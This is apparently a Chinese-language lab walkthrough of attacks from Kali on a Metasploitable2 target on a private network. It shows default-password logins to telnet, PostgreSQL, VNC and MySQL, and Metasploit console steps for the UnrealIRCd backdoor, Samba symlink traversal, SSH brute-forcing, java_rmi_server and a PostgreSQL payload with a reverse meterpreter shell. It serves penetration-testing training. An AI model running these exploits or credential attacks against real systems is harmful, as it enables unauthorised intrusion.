演示環境
1、靶機: Metasploitable2-Linux
IP:192.168.184.130
2、攻擊機:Kali-Linux-2021.02-amd64
IP:192.168.184.128
掃描端口
系統弱密碼登錄
1、在kali上執行命令行telnet 192.168.184.130
2、Login和password都輸入msfadmin
3、登錄成功,進入系統
4、測試如下:
PostgreSQL弱密碼登錄
1、在Kali上執行psql -h 192.168.184.130 –U postgres
2、輸入密碼:postgres
3、登錄成功,進入postgresql系統
VNC弱密碼登錄
1、在kali圖形界面的終端中執行vncviewer 192.168.184.130
2、輸入密碼 password
3、登錄成功,進入系統
MySQL弱密碼登錄
1、在kali上執行mysql –h 192.168.184.130 –u root
2、登錄成功,進入MySQL系統
Samba sysmlink 默認配置目錄遍歷漏洞
CVE-2010-0926
端口: 445
利用模塊:
auxiliary/admin/smb/samba_symlink_traversal set SMBSHARE tmp //設置SAM可寫文件
UnrealIRCd Backdoor(ircd)
端口: 6667
利用模塊: exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor 調試模塊 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set 查看設置信息 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.184.130 rhosts => 192.168.184.130 設置攻擊目標IP地址 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run 執行 [-] 192.168.184.130:6667 - Exploit failed: A payload has not been selected. 發現沒有配置默認的payload [*] Exploit completed, but no session was created.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads 查看可以使用的payload msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl payload => cmd/unix/bind_perl msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
ssh用戶名密碼掃描
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > search ssh_login 查找模塊 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(scanner/ssh/ssh_login) > set msf6 auxiliary(scanner/ssh/ssh_login) > set username root 設置暴力破解的用戶名 username => root msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/root_userpass.txt 設置暴力破解文件 userpass => file /usr/share/worilsts/metasploit/root_userpass.txt msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.184.130 設置攻擊目標的IP地址 rhosts => 192.168.184.130
msf6 auxiliary(scanner/ssh/ssh_login) > run 執行,得出的密碼是root
利用服務器不安全默認配置java代碼
msf6 auxiliary(scanner/ssh/ssh_login) > search java_rmi_server 查詢模塊 msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.184.130 設置執行目標IP地址 rhosts => 192.168.184.130 msf6 exploit(multi/misc/java_rmi_server) > exploit 執行
Postgres共享庫代碼任意執行
在一些默認的Linux安裝的PostgreSQL,postgres服務賬戶可以寫到/tmp目錄,還有共享庫,允許任意執行代碼
msf6 exploit(multi/misc/java_rmi_server) > search PostgreSQL 查找相應的模塊 msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 調用模塊 [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/postgres/postgres_payload) > set 查看設置 msf6 exploit(linux/postgres/postgres_payload) > set rhosts 192.168.184.130 設置攻擊目標IP地址 rhosts => 192.168.184.130 msf6 exploit(linux/postgres/postgres_payload) > run 執行